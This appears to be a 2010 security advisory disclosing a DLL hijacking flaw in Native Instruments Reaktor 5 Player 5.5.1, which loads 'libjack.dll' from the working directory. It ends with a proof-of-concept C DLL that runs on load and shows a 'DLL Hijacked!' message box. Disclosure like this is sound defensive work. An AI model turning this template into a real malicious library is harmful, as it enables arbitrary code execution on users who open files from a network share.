/* Native Instruments Reaktor 5 Player v5.5.1 Insecure Library Loading Vulnerability Vendor: Native Instruments GmbH Product web page: http://www.native-instruments.com Affected version: 5.5.1 (R10584) or 5.5.1.10584 (Standalone) Summary: REAKTOR 5 PLAYER is your free entry point to the award-winning and avant-garde audio world of REAKTOR 5 - the super-powerful modular sound studio that made Native Instruments famous. Desc: Reaktor 5 Player suffers from a DLL hijacking vulnerability, which could be exploited by remote attackers to compromise a vulnerable system. This issue is caused due to the application insecurely loading certain libraries ("libjack.dll") from the current working directory, which could allow attackers to execute arbitrary code by tricking a user into opening specific related files (.ens, .ism, .map, .mdl, .ntf, .rcc, .rcm, .rkplr and .ssf) from a network share. Tested on: Microsoft Windows XP Professional SP3 (English) Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk Advisory ID: ZSL-2010-4974 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4974.php 06.11.2010 */ #include BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_mll(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int dll_mll() { MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK); }